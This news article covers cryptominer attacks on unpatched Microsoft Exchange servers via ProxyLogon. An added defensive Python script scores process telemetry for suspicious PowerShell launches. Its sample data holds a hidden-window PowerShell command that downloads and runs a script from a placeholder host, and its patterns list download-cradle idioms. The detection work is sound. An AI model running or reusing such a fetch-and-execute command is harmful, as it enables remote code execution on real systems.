Cybercriminals are targeting vulnerable Microsoft Exchange servers with cryptomining malware. The zero-day vulnerabilities in Microsoft Exchange Server were analyzed last month, when Microsoft released security updates to prevent the exploitation of vulnerable systems.
Many cyber criminals, including state-sponsored hackers and ransomware gangs, have tried to take advantage of vulnerable Exchange servers.
Security researchers at Sophos, however, have also detected attackers using the ProxyLogon exploit on Microsoft Exchange Servers to secretly install a Monero cryptominer.
Monero is not as valuable as Bitcoin, but it is easier to mine, which makes it especially attractive to cyber criminals. In addition, it provides greater anonymity, making it difficult to identify the owners of a wallet and the attackers behind it.
While cryptomining is not considered as severe as a ransomware attack or the loss of sensitive data, it remains a major concern for organizations as well: many of them have not yet applied the Microsoft security updates, and their systems are still vulnerable.
According to Sophos' analysis, the Monero wallet of the criminal behind this cryptomining campaign started receiving mining proceeds on March 9, a few days after the Microsoft Exchange Server vulnerabilities were revealed. This means that the attacker began exploiting vulnerable systems immediately.
Attacks start with a PowerShell command and end with downloaded executable payloads that install the Monero miner.
Researchers say the executable appears to contain a modified version of a tool that is publicly available on GitHub. Once it runs on a compromised server, the installation files are deleted while the mining process keeps running in memory.
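As an added example (not code from the Sophos report or from the original article), the following Python script shows how a defender could score process-creation telemetry for the chain described above: a shell launched by the Exchange web server's worker process (assumed here to be IIS's w3wp.exe, which the article does not name) whose command line carries a PowerShell download cradle or hides its window. The event records, field names and thresholds are constructed sample data and assumptions for illustration, not real logs.

```python
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Constructed process-creation records in a generic EDR-export shape.
# These are made-up sample lines, not telemetry from any real host.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/s.ps1')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell Get-Service MSExchange*"},
    {"parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c echo ok"},
    {"parent": r"C:\Program Files\Admin\deploy.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -c \"Invoke-WebRequest https://updates.example.invalid/agent.msi"
            " -OutFile C:\\Temp\\agent.msi\""},
]

# PowerShell idioms that fetch and run remote content (download cradles).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient",
    re.IGNORECASE)
# Hidden window or a long base64 blob after -e/-enc/-EncodedCommand.
STEALTH_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}",
    re.IGNORECASE)
# Assumption: the Exchange front end runs inside IIS worker processes.
WEB_WORKERS = ("w3wp.exe",)
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")


@dataclass
class Finding:
    index: int            # position of the event in the input list
    score: int
    reasons: List[str] = field(default_factory=list)


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: dict) -> Tuple[int, List[str]]:
    """Add up weighted indicators for one process-creation record."""
    parent, image, cmd = _basename(ev["parent"]), _basename(ev["image"]), ev["cmd"]
    score, reasons = 0, []
    if parent in WEB_WORKERS and image in SHELLS:
        score += 2
        reasons.append(f"{image} spawned by web worker {parent}")
    if DOWNLOAD_CRADLE.search(cmd):
        score += 2
        reasons.append("download cradle in command line")
    if STEALTH_FLAGS.search(cmd):
        score += 1
        reasons.append("hidden window or encoded command")
    return score, reasons


def find_suspicious(events: List[dict], threshold: int = 3) -> List[Finding]:
    """Return the events whose combined indicator score reaches the threshold."""
    findings = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append(Finding(i, score, reasons))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"event {f.index}: score {f.score}: {'; '.join(f.reasons)}")
```

Only the first constructed record crosses the threshold: a web worker spawning PowerShell, a download cradle and a hidden window together score 5. The legitimate-looking Invoke-WebRequest run by an admin tool scores 2 and stays below the bar, which is the point of combining indicators rather than alerting on any single one.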
Organizations whose servers have been compromised by cryptomining malware will probably not notice that there is a problem, unless the intruder is greedy with processing power, in which case the victim will realize that something is wrong.
To protect networks from attacks that exploit the Microsoft Exchange Server vulnerabilities, organizations should apply the security updates as soon as possible.